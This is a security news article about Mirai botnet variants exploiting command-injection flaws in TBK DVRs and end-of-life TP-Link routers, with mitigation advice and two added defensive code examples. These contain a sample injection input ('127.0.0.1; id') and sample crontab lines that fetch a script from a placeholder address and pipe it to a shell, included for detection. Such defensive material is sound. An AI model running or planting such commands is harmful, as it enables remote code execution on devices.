
Threat Actors Unleash Mirai Variants via Vulnerabilities in TBK DVRs and End-of-Life TP-Link Routers

Cybersecurity researchers have issued urgent warnings regarding active exploitation campaigns leveraging critical security flaws in TBK Digital Video Recorders (DVRs) and End-of-Life (EoL) TP-Link Wi-Fi routers. These campaigns are deploying sophisticated variants of the notorious Mirai botnet, including a new iteration dubbed "Nexcorium" and another known as "Condi," turning compromised devices into powerful engines for Distributed Denial-of-Service (DDoS) attacks. Findings from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 highlight the persistent threat posed by unpatched and unsupported Internet of Things (IoT) devices in the global cyber landscape.

The Rise of Nexcorium: Targeting TBK DVRs via CVE-2024-3721

At the forefront of these attacks is the exploitation of CVE-2024-3721, a medium-severity command injection vulnerability impacting specific TBK DVR models, including the DVR-4104 and DVR-4216. This flaw, with a CVSS score of 6.3, allows unauthorized attackers to execute arbitrary commands on vulnerable devices, paving the way for malware deployment. The current campaign, meticulously tracked by Fortinet, is primarily focused on delivering a Mirai variant known as Nexcorium.

Command injection vulnerabilities are a particularly insidious class of security flaw, enabling attackers to inject and execute system commands through improperly sanitized user input. In the context of IoT devices like DVRs, which are often connected directly to the internet for remote access, such a vulnerability creates a critical pathway for compromise. Once exploited, Nexcorium establishes a foothold, displaying a message confirming "nexuscorp has taken control," a chilling declaration of compromise.
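To make the "improperly sanitized user input" failure concrete, the following is an added example written for this page, not code from the affected DVR firmware or from Fortinet's report. It models a hypothetical remote-diagnostics handler that pings a user-supplied host: `vulnerable_command` shows the string-concatenation pattern that lets shell metacharacters in the input become extra commands, and `hardened_argv` shows the fix (allow-list validation plus an argv list executed without a shell). The `run_diagnostic` helper substitutes `echo` for `ping` so it runs offline; that substitution is the example's own choice.

```python
import ipaddress
import re
import subprocess

# Hostname syntax check (RFC 1123 labels): letters, digits, hyphens, dot-separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(target: str) -> str:
    """Vulnerable pattern (shown only to contrast with the fix): untrusted input
    is pasted into a shell command line. If this string reaches os.system() or
    subprocess with shell=True, a ';' or '|' in `target` starts a second command."""
    return f"ping -c 1 {target}"


def validate_target(target: str) -> str:
    """Allow-list check: accept only an IP literal or a syntactically valid
    hostname. Spaces, ';', '|', '$(' and backticks all fail both checks."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected diagnostic target: {target!r}")


def hardened_argv(target: str) -> list[str]:
    """Hardened pattern: validate first, then build an argv list. Without a
    shell the input can only ever be a single argument to ping, never a
    separate command, and validation rejects it before it gets that far."""
    return ["ping", "-c", "1", validate_target(target)]


def run_diagnostic(target: str, binary: str = "echo") -> str:
    """Execute the hardened argv with no shell involved. `binary` defaults to
    echo so the example runs offline; a real handler keeps argv[0] = 'ping'."""
    argv = [binary] + hardened_argv(target)[1:]
    completed = subprocess.run(argv, capture_output=True, text=True, check=False)
    return completed.stdout.strip()


if __name__ == "__main__":
    hostile = "127.0.0.1; id"                      # constructed injection attempt
    print("unsafe string :", vulnerable_command(hostile))
    print("hardened argv :", hardened_argv("dvr.example.lan"))
    try:
        run_diagnostic(hostile)
    except ValueError as exc:
        print("rejected      :", exc)
```

The two layers are deliberate: the argv list removes the shell, so there is nothing for a metacharacter to break out of, and the allow-list rejects anything that is not a host at all, so a malformed value never reaches the binary. Quoting the input with `shlex.quote` while keeping `shell=True` is a weaker substitute because it still trusts the shell to interpret the result.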

Vincent Li, a security researcher at Fortinet, underscored the broader trend, stating, "IoT devices are increasingly prime targets for large-scale attacks due to their widespread use, lack of patching, and often weak security settings. Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks." This statement encapsulates the core challenge facing the security of the burgeoning IoT ecosystem, where convenience often outweighs robust security practices.

A Persistent Threat: The Mirai Botnet Ecosystem

The Mirai botnet first exploded onto the cybersecurity scene in 2016, gaining infamy for orchestrating some of the largest DDoS attacks in history, most notably against DNS provider Dyn, which temporarily brought down major websites and services across the internet. Its modus operandi revolves around scanning the internet for IoT devices protected by weak or default credentials, then infecting them with malware to recruit them into a vast network of compromised "bots." These bots are then commanded by a central server to launch overwhelming traffic floods against target websites or services, rendering them inaccessible.

Since its source code was leaked in 2016, Mirai has spawned countless variants, each with its own modifications, target lists, and exploitation methods. Nexcorium, as described by Fortinet, exhibits the classic architectural hallmarks of a Mirai variant, including XOR-encoded configuration table initialization, a watchdog module designed to prevent the malware from being terminated, and a dedicated DDoS attack module capable of launching various types of assaults (UDP, TCP, and SMTP floods). This evolution demonstrates the adaptability of threat actors, who continually refine their tools to target new vulnerabilities and broaden their reach.

Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet

The exploitation of CVE-2024-3721 is not a new phenomenon. Over the past year, this same vulnerability has been a consistent vector for other malicious campaigns. Prior reports have detailed its use in deploying other Mirai variants, as well as a distinct, relatively newer botnet named RondoDox. In September 2025, CloudSEK further elaborated on a large-scale "loader-as-a-service" botnet infrastructure actively distributing RondoDox, Mirai, and Morte payloads. This infrastructure primarily relies on weak credentials and outdated flaws in a diverse array of routers, general IoT devices, and even enterprise applications, highlighting a multi-pronged attack strategy that preys on fundamental security weaknesses.

The operational mechanics of Nexcorium involve a multi-stage infection process. Upon successful exploitation of CVE-2024-3721, a downloader script is fetched and executed. This script determines the Linux system's architecture and then retrieves the matching botnet payload. Once running, Nexcorium not only functions as a DDoS bot but also incorporates additional capabilities to expand its reach. It includes an exploit for CVE-2017-17215, targeting Huawei HG532 devices within the network, and a list of hard-coded usernames and passwords. These credentials are used in brute-force attacks over Telnet, attempting to compromise other devices on the victim's network. Successful Telnet logins lead to shell access, persistence mechanisms (such as crontab entries and systemd services), and communication with an external command-and-control (C2) server, from which the bot awaits instructions for DDoS operations. To further complicate analysis and removal, the malware deletes its original downloaded binary after establishing persistence.
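Three of the behaviours just described leave host-level traces a defender can look for: a process that keeps running after its binary was deleted, cron entries that fetch a script and pipe it to a shell, and a burst of failed Telnet logins from one source. The script below is an added example written for this page, not tooling from Fortinet or from the article; the process snapshot, crontab and log lines are constructed samples, and the syslog format assumed is the `FAILED LOGIN ... FROM ... FOR ...` line written by util-linux `login`.

```python
import os
import re
from collections import Counter

# --- Constructed sample data (not from the article) --------------------------
# Targets of /proc/<pid>/exe symlinks as a triage script would collect them.
SAMPLE_PROC_EXE = {
    "812": "/usr/sbin/dropbear",
    "1407": "/tmp/.arm7 (deleted)",   # still running, but the file was unlinked
    "1533": "/bin/busybox",
}

# A root crontab with two fetch-and-pipe-to-shell entries mixed in.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot wget -q -O- http://203.0.113.10/x.sh | sh
*/10 * * * * curl -s http://203.0.113.10/k.sh | bash
"""

# Syslog lines: four failures from one address, one from another, one success.
SAMPLE_AUTH_LOG = [
    "Jan 12 03:14:01 dvr login[2201]: FAILED LOGIN 1 FROM 203.0.113.10 FOR root, Authentication failure",
    "Jan 12 03:14:02 dvr login[2201]: FAILED LOGIN 2 FROM 203.0.113.10 FOR root, Authentication failure",
    "Jan 12 03:14:03 dvr login[2201]: FAILED LOGIN 3 FROM 203.0.113.10 FOR admin, Authentication failure",
    "Jan 12 03:14:04 dvr login[2203]: FAILED LOGIN 1 FROM 203.0.113.10 FOR admin, Authentication failure",
    "Jan 12 03:20:11 dvr login[2290]: FAILED LOGIN 1 FROM 198.51.100.7 FOR root, Authentication failure",
    "Jan 12 03:21:45 dvr login[2295]: root login on 'pts/0' from '203.0.113.10'",
]

DELETED_SUFFIX = " (deleted)"
FETCH_PIPE_SH_RE = re.compile(r"\b(?:wget|curl|tftp)\b.*\|\s*(?:sh|bash|ash)\b")
FAILED_LOGIN_RE = re.compile(r"FAILED LOGIN \d+ FROM (\S+) FOR (\S+)")


def collect_proc_exe():
    """Read /proc/<pid>/exe for every live process on a Linux host.
    Unreadable entries (other users' processes, kernel threads) are skipped."""
    snapshot = {}
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            snapshot[pid] = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            pass
    return snapshot


def processes_with_deleted_binary(proc_exe):
    """PIDs whose executable was unlinked while the process kept running.
    The kernel appends ' (deleted)' to the exe link target in that case."""
    return sorted(pid for pid, exe in proc_exe.items() if exe.endswith(DELETED_SUFFIX))


def suspicious_cron_entries(crontab_text):
    """Non-comment crontab lines that download something and pipe it to a shell."""
    return [
        line for line in crontab_text.splitlines()
        if line and not line.startswith("#") and FETCH_PIPE_SH_RE.search(line)
    ]


def bruteforce_sources(log_lines, threshold=3):
    """Source addresses with at least `threshold` failed logins."""
    failures = Counter()
    for line in log_lines:
        match = FAILED_LOGIN_RE.search(line)
        if match:
            failures[match.group(1)] += 1
    return {src: count for src, count in failures.items() if count >= threshold}


def triage(proc_exe, crontab_text, log_lines, threshold=3):
    """Combine the three checks into one report dictionary."""
    return {
        "deleted_binary_pids": processes_with_deleted_binary(proc_exe),
        "cron_fetch_and_run": suspicious_cron_entries(crontab_text),
        "bruteforce_sources": bruteforce_sources(log_lines, threshold),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PROC_EXE, SAMPLE_CRONTAB, SAMPLE_AUTH_LOG).items():
        print(f"{key}: {value}")
```

On a real device `collect_proc_exe()` replaces the sample snapshot; the crontab and log inputs would come from `crontab -l` and the syslog file respectively. None of these findings is conclusive alone (legitimate upgrades also leave processes with deleted binaries), but the combination of a deleted binary in a world-writable directory, a fetch-and-run cron entry and a failed-login burst is the pattern the article describes.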


Fortinet’s analysis concludes, "The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems. Its use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and efficacy in increasing its infection reach." This underscores the sophistication and comprehensive nature of these contemporary IoT botnets.

Exploiting End-of-Life Devices: The TP-Link Router Vulnerability (CVE-2023-33538)

Adding another layer of concern, Palo Alto Networks Unit 42 has reported detecting active, automated scans and probes specifically targeting CVE-2023-33538. This is a command injection vulnerability (CVSS score: 8.8) affecting End-of-Life (EoL) TP-Link wireless routers. While the observed attacks were described as "flawed" and unsuccessful in achieving full compromise due to an incorrect exploitation approach, the underlying vulnerability remains real and highly critical.

The severity of CVE-2023-33538 was recognized by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which added it to its Known Exploited Vulnerabilities (KEV) catalog in June 2025. This inclusion in the KEV catalog signifies that federal agencies are required to patch this vulnerability within a specified timeframe due to its proven exploitation in the wild. While specific models were not listed in the original report, the vulnerability affects a range of older TP-Link wireless routers that are no longer receiving official security updates or support from the manufacturer.

Researchers Asher Davila, Malav Vyas, and Chris Navarrete from Unit 42 confirmed the validity of the flaw, stating, "Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real. Successful exploitation requires authentication to the router’s web interface." This emphasizes that while current attempts might be clumsy, a more skilled attacker could easily refine their methods to achieve successful compromise, especially if default or weak credentials are in place.

The Mirai-like botnet malware associated with these TP-Link router attacks features numerous references to the string "Condi," indicating a distinct variant. This malware is equipped with self-update capabilities, ensuring it can evolve and adapt over time. Furthermore, it can act as a web server, potentially spreading the infection to other devices that connect to it, thereby multiplying its reach within a network. The danger posed by EoL devices is particularly acute because users often continue to operate them long after manufacturer support ceases, leaving them permanently vulnerable to newly discovered flaws or persistent exploitation of known ones.

The Broader Landscape of IoT Vulnerabilities and Botnets


The incidents involving TBK DVRs and TP-Link routers are symptomatic of a much larger problem: the precarious state of security within the vast and rapidly expanding IoT landscape. Billions of interconnected devices, ranging from smart home gadgets to industrial sensors, often come with weak default security settings, unpatched firmware, and a complete lack of long-term support. This creates an enormous attack surface for threat actors.

A significant contributor to this vulnerability is the prevalence of default credentials. Many users fail to change factory-set usernames and passwords, which are often widely known or easily guessed. This transforms what might be a limited, authenticated vulnerability into a critical, easily exploitable entry point for determined attackers. As Unit 42 aptly noted, "For the foreseeable future, the security landscape will continue to be shaped by the persistent risk of default credentials in IoT devices. These credentials can turn a limited, authenticated vulnerability into a critical entry point for determined attackers."


The economic implications of DDoS attacks are substantial. According to various industry reports, the average cost of a DDoS attack can range from tens of thousands to hundreds of thousands of dollars per hour, depending on the scale and impact on business operations. Beyond direct financial losses from downtime, companies face reputational damage, loss of customer trust, and potential regulatory fines. In 2023, the global cost of cybercrime, including DDoS attacks, was estimated to be in the trillions of dollars, underscoring the severe economic toll of such malicious activities.

Mitigation and Recommendations

Given the severe risks, immediate and proactive measures are essential for both individuals and organizations:

  1. Patching and Firmware Updates: For devices that are still supported, users must regularly check for and apply the latest firmware updates. These updates frequently include critical security patches that close known vulnerabilities.
  2. Replace End-of-Life Devices: The most crucial recommendation for EoL devices like the affected TP-Link routers is to replace them immediately. Continuing to use unsupported hardware is an open invitation for compromise, as no further security updates will ever be provided.
  3. Strong, Unique Credentials: Change all default usernames and passwords on IoT devices, routers, and DVRs to strong, unique combinations that are difficult to guess or brute-force. Utilize a password manager to help manage complex credentials.
  4. Network Segmentation: For businesses and even advanced home users, segmenting IoT devices onto a separate network (e.g., a guest Wi-Fi network or a dedicated VLAN) can prevent them from accessing more sensitive parts of the main network, limiting the potential damage if a device is compromised.
  5. Firewall and Intrusion Detection Systems (IDS): Implement robust firewalls and IDS/IPS solutions to monitor network traffic for suspicious activity and block known malicious connections.
  6. Disable Unnecessary Services: Turn off any services or ports on routers and IoT devices that are not essential for their operation (e.g., Telnet, UPnP if not needed).
  7. Monitor for Unusual Activity: Regularly monitor network logs and device behavior for any signs of compromise, such as unusual outbound traffic or unexpected reboots.
  8. Educate Users: User awareness is paramount. Educating employees and family members about the risks of IoT devices and the importance of strong security practices can significantly reduce the attack surface.

The Future of IoT Security

The ongoing exploitation of vulnerabilities in devices like TBK DVRs and EoL TP-Link routers by Mirai variants serves as a stark reminder of the persistent and evolving threat landscape. The proliferation of IoT devices, coupled with often inadequate security measures, creates a fertile ground for botnet operators. As the world becomes increasingly interconnected, the security of every device, no matter how small or seemingly insignificant, contributes to the overall resilience of the global digital infrastructure.

The challenge demands a collaborative effort from manufacturers, who must prioritize security by design and provide long-term support; from regulators, who can enforce minimum security standards; and from users, who must take responsibility for securing their own devices. Without such concerted action, the internet will continue to grapple with the specter of massive botnets, capable of disrupting critical services and undermining trust in the digital realm. The battle against IoT botnets is far from over, and vigilance remains the strongest defense.

Tech Newst